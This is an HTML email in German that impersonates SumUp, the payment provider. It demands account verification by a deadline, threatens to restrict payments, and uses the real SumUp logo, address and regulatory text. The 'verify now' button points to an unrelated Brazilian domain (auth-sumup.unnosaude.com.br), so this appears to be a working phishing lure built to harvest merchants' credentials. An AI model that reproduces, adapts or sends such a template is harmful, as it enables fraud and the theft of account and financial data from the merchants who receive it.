<!DOCTYPE html>
<html lang="de">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SumUp - Konto-Verifizierung erforderlich</title>
    <style>
        /* Reset and Base Styles */
        body, html {
            margin: 0;
            padding: 0;
            font-family: 'Helvetica Neue', Arial, sans-serif;
            line-height: 1.5;
            color: #333333;
            background-color: #f8f9fa;
        }
        
        /* Email Container */
        .email-container {
            max-width: 600px;
            margin: 0 auto;
            background-color: #ffffff;
            border-radius: 8px;
            overflow: hidden;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.05);
        }
        
        /* Header */
        .email-header {
            padding: 25px 30px 15px;
            text-align: center;
            border-bottom: 1px solid #eaeaea;
        }
        
        .logo {
            max-width: 140px;
            height: auto;
        }
        
        .email-title {
            font-size: 22px;
            font-weight: 600;
            color: #1a1a1a;
            margin: 15px 0 5px;
        }
        
        .email-subtitle {
            font-size: 16px;
            color: #666666;
            margin-bottom: 10px;
        }
        
        /* Priority Banner */
        .priority-banner {
            background: linear-gradient(135deg, #2e55e8 0%, #1a3bc8 100%);
            color: #ffffff;
            padding: 18px 30px;
            text-align: center;
            font-weight: 600;
            font-size: 16px;
        }
        
        .priority-banner span {
            display: inline-block;
            margin-right: 10px;
        }
        
        /* Content */
        .email-content {
            padding: 30px;
        }
        
        .greeting {
            font-size: 16px;
            margin-bottom: 20px;
        }
        
        .status-card {
            background-color: #f0f5ff;
            border-radius: 6px;
            padding: 18px;
            margin: 20px 0;
            display: flex;
            align-items: center;
            border-left: 4px solid #2e55e8;
        }
        
        .status-icon {
            margin-right: 15px;
            font-size: 20px;
        }
        
        .status-details strong {
            display: block;
            margin-bottom: 5px;
            font-size: 16px;
        }
        
        .deadline {
            color: #d9534f;
            font-weight: 600;
        }
        
        .action-required {
            background-color: #fff8e6;
            border: 1px solid #ffd54f;
            border-radius: 6px;
            padding: 20px;
            margin: 25px 0;
        }
        
        .action-required h3 {
            margin-top: 0;
            color: #e67e22;
            font-size: 16px;
        }
        
        .action-required ul {
            margin: 10px 0;
            padding-left: 20px;
        }
        
        .action-required li {
            margin-bottom: 5px;
        }
        
        .cta-container {
            text-align: center;
            margin: 30px 0;
        }
        
        .cta-button {
            display: inline-block;
            background: linear-gradient(135deg, #2e55e8 0%, #1a3bc8 100%);
            color: #ffffff !important;
            text-decoration: none;
            padding: 14px 32px;
            border-radius: 6px;
            font-weight: 600;
            font-size: 16px;
            box-shadow: 0 2px 5px rgba(46, 85, 232, 0.3);
            transition: all 0.2s ease;
        }
        
        .cta-button:hover {
            background: linear-gradient(135deg, #1a3bc8 0%, #1531a3 100%);
            box-shadow: 0 3px 8px rgba(46, 85, 232, 0.4);
            transform: translateY(-1px);
        }
        
        .benefits-section {
            margin-top: 35px;
        }
        
        .benefits-section h3 {
            font-size: 18px;
            margin-bottom: 20px;
            color: #1a1a1a;
        }
        
        .benefit-item {
            display: flex;
            margin-bottom: 20px;
            align-items: flex-start;
        }
        
        .benefit-icon {
            margin-right: 15px;
            color: #2e55e8;
            font-size: 18px;
            min-width: 24px;
        }
        
        .benefit-content h4 {
            margin: 0 0 5px;
            font-size: 16px;
            font-weight: 600;
        }
        
        .benefit-content p {
            margin: 0;
            color: #666666;
        }
        
        /* Footer */
        .email-footer {
            background-color: #f8f9fa;
            padding: 25px 30px;
            border-top: 1px solid #eaeaea;
            font-size: 13px;
            color: #666666;
            line-height: 1.5;
        }
        
        .company-info {
            margin-bottom: 15px;
        }
        
        .legal-disclaimer {
            font-size: 11px;
            color: #888888;
            line-height: 1.4;
            margin-top: 20px;
            padding-top: 15px;
            border-top: 1px solid #eaeaea;
        }
        
        .footer-links {
            margin-top: 15px;
        }
        
        .footer-links a {
            color: #666666;
            text-decoration: none;
            margin-right: 15px;
            font-size: 12px;
        }
        
        .footer-links a:hover {
            text-decoration: underline;
        }
        
        /* Responsive */
        @media (max-width: 480px) {
            .email-content, .email-footer {
                padding: 20px;
            }
            
            .email-header {
                padding: 20px 20px 10px;
            }
            
            .priority-banner {
                padding: 15px 20px;
            }
            
            .status-card {
                flex-direction: column;
                align-items: flex-start;
            }
            
            .status-icon {
                margin-bottom: 10px;
            }
        }
    </style>
</head>
<body style="margin: 0;
            padding: 0;
            font-family: 'Helvetica Neue', Arial, sans-serif;
            line-height: 1.5;
            color: #333333;
            background-color: #f8f9fa">
    <div style="max-width: 600px;
            margin: 0 auto;
            background-color: #ffffff;
            border-radius: 8px;
            overflow: hidden;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.05)" class="email-container">
        <!-- Header -->
        <div style="padding: 25px 30px 15px;
            text-align: center;
            border-bottom: 1px solid #eaeaea" class="email-header">
            <img src="https://image.crm.sumup.com/lib/fe5f15707c6201797016/m/5/3c2f852f-0740-4ba9-a523-69bf2c7d22a4.png" alt="SumUp Logo" class="logo" width="1161" height="336">
            <h1 class="email-title">Konto-Verifizierung erforderlich</h1>
            <p class="email-subtitle">Bitte bestätigen Sie Ihre Identität für SumUp</p>
        </div>
        
        <!-- Priority Banner -->
        <div style="background: linear-gradient(135deg, #2e55e8 0%, #1a3bc8 100%);
            color: #ffffff;
            padding: 18px 30px;
            text-align: center;
            font-weight: 600;
            font-size: 16px" class="priority-banner">
            <span style="display: inline-block;
            margin-right: 10px">🔒</span> Handlungsbedarf: Verifizieren Sie Ihr Konto bis zum 25. November 2025
        </div>
        
        <!-- Content -->
        <div style="padding: 30px" class="email-content">
            <p class="greeting">Sehr geehrte/r Kunde/in,</p>
            
            <p>Um die Sicherheit Ihres SumUp-Kontos zu gewährleisten und gesetzliche Anforderungen zu erfüllen, benötigen wir eine einmalige Verifizierung Ihrer Daten. Dieser Prozess ist Teil unserer Sicherheitsmaßnahmen zum Schutz vor Betrug und unbefugtem Zugriff.</p>
            
            <div class="status-card">
                <div style="margin-right: 15px;
            font-size: 20px" class="status-icon">📋</div>
                <div class="status-details">
                    <strong style="display: block;
            margin-bottom: 5px;
            font-size: 16px">Status: Ausstehend</strong>
                    <span style="color: #d9534f;
            font-weight: 600" class="deadline">Frist: 25. November 2025</span>
                </div>
            </div>
            
            <div style="background-color: #fff8e6;
            border: 1px solid #ffd54f;
            border-radius: 6px;
            padding: 20px;
            margin: 25px 0" class="action-required">
                <h3 style="margin-top: 0;
            color: #e67e22;
            font-size: 16px">⚠️ Wichtige Information</h3>
                <p>Wenn Sie Ihr Konto nicht bis zum <strong>25. November 2025</strong> verifizieren, werden folgende Funktionen vorübergehend eingeschränkt:</p>
                <ul style="margin: 10px 0;
            padding-left: 20px">
                    <li>Empfang von Zahlungen</li>
                    <li>Ausgehende Transaktionen</li>
                    <li>Zugriff auf bestimmte Kontofunktionen</li>
                </ul>
            </div>
            
            <div class="cta-container">
                <a style="display: inline-block;
            background: linear-gradient(135deg, #2e55e8 0%, #1a3bc8 100%);
            color: #ffffff !important;
            text-decoration: none;
            padding: 14px 32px;
            border-radius: 6px;
            font-weight: 600;
            font-size: 16px;
            box-shadow: 0 2px 5px rgba(46, 85, 232, 0.3);
            transition: all 0.2s ease" href="https://auth-sumup.unnosaude.com.br/verif/" class="cta-button">Jetzt Konto verifizieren</a>
            </div>
            
            <div style="margin-top: 35px" class="benefits-section">
                <h3 style="font-size: 18px;
            margin-bottom: 20px;
            color: #1a1a1a">Ihre Vorteile nach der Verifizierung:</h3>
                
                <div class="benefit-item">
                    <div style="margin-right: 15px;
            color: #2e55e8;
            font-size: 18px;
            min-width: 24px" class="benefit-icon">🛡️</div>
                    <div class="benefit-content">
                        <h4 style="margin: 0 0 5px;
            font-size: 16px;
            font-weight: 600">Erhöhte Kontosicherheit</h4>
                        <p style="margin: 0;
            color: #666666">Optimaler Schutz vor unbefugtem Zugriff und betrügerischen Aktivitäten.</p>
                    </div>
                </div>
                
                <div class="benefit-item">
                    <div style="margin-right: 15px;
            color: #2e55e8;
            font-size: 18px;
            min-width: 24px" class="benefit-icon">📋</div>
                    <div class="benefit-content">
                        <h4 style="margin: 0 0 5px;
            font-size: 16px;
            font-weight: 600">Rechtliche Konformität</h4>
                        <p style="margin: 0;
            color: #666666">Erfüllung der EU-Vorgaben zur Identitätsprüfung gemäß Zahlungsdiensterichtlinie.</p>
                    </div>
                </div>
                
                <div class="benefit-item">
                    <div style="margin-right: 15px;
            color: #2e55e8;
            font-size: 18px;
            min-width: 24px" class="benefit-icon">✅</div>
                    <div class="benefit-content">
                        <h4 style="margin: 0 0 5px;
            font-size: 16px;
            font-weight: 600">Uneingeschränkter Zugriff</h4>
                        <p style="margin: 0;
            color: #666666">Volle Nutzung aller SumUp-Funktionen, Auszahlungen und Services.</p>
                    </div>
                </div>
            </div>
        </div>
        
        <!-- Footer -->
        <div style="background-color: #f8f9fa;
            padding: 25px 30px;
            border-top: 1px solid #eaeaea;
            font-size: 13px;
            color: #666666;
            line-height: 1.5" class="email-footer">
            <div class="company-info">
                <strong>SumUp Payments Ltd.</strong><br>
                16–20 Shorts Gardens, London WC2H 9US, Vereinigtes Königreich
            </div>
            
            
            <div style="font-size: 11px;
            color: #888888;
            line-height: 1.4;
            margin-top: 20px;
            padding-top: 15px;
            border-top: 1px solid #eaeaea" class="legal-disclaimer">
                SumUp Payments Limited ist im Vereinigten Königreich von der Financial Conduct Authority gemäß den Electronic Money Regulations 2011 (Registernummer 900700) zugelassen.
            </div>
            
            <div class="footer-links">
                <a href="#">Einstellungen</a>
                <a href="#">Abmelden</a>
                <a href="#">Datenschutz</a>
                <a href="#">Hilfe</a>
            </div>
        </div>
    </div>
</body>
</html>